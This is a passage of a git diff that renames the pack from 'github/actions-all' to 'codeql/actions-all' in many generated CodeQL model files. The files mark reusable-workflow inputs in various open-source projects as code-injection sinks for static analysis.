b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 85771a98962a..0bba5671572e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 194ac90b6482..37bd78f271d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index d013a9c1b8f2..ebc6dfe01d21 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 57d88f541865..ab3c341b895e 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index 312d9e193e7c..78f8e605665f 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index b62903a97e93..d4d377730af0 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index e983a4a6c985..d8cb45c66a74 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 4a45392e15d3..2fc426809c24 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index ac20cdeeb3d7..eee7b011b0c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index f6876b3bc56c..4dbaa756bc7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 9785efe9637c..f78ded292a5c 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 3197652aadc0..a0df95b6c756 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index f0ebfa177242..0538073273c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index 74afc5c0cc54..d2d543b9cf80 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index fa145f6b6257..77c35145d4e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ab486b47df26..68433b763418 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index dc402bc1e458..c99b05845106 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index b5d4d6e4bde0..bbdee0166f80 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 83b45112b862..caccb0883390 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index c40044c852ee..f2172a5aaef8 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 011787908473..59e33f0b6527 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 9593323f325a..ee54a015ebbb 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 7901da27836d..5e750a24f30b 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index ccb1bd246546..5622dd89b573 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 8317fdabab05..bd4406f24542 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 529e1576e748..748e317edff3 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index d659fbc8089a..7bc475348144 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 9ca03d9aee1b..060025b349b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 725487f10050..408d0b8b5240 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 2bda8bb60a53..e24be2d0a21c 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index e91b615cbe64..4e4140577982 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e09e461e605e..60c109da3e3f 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index f8dd54aee14d..1ac813e5e7fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index c4aaa28f00b1..13878976e43b 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 546dac977a80..c66aff8690f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 3a072fd9f07c..b99f14b3c529 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 08a5f8fc58ea..aa7b4a1c9b81 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 299c70daa54a..2689698d33b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index 3e03b65cb8b0..3c9e6718f915 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 20eb977b973a..a91b3ed66a43 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 4e58b2fa38cc..fcfee85a8dad 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index 6935bc7788d0..11d56b2b70b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 94d733fa0c4e..a824d844d866 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 6b1214886fe4..a7427768bbe3 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 4a97c50ad6e7..505bb0cad074 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index a6e4c3473f26..0899d449725e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index be72ba183574..89a0ccfdb85f 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 5f4a4a09cd00..053e863a5130 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index 4cadb751d755..88d66d40826d 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 1257c67c1807..534936eab1f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git 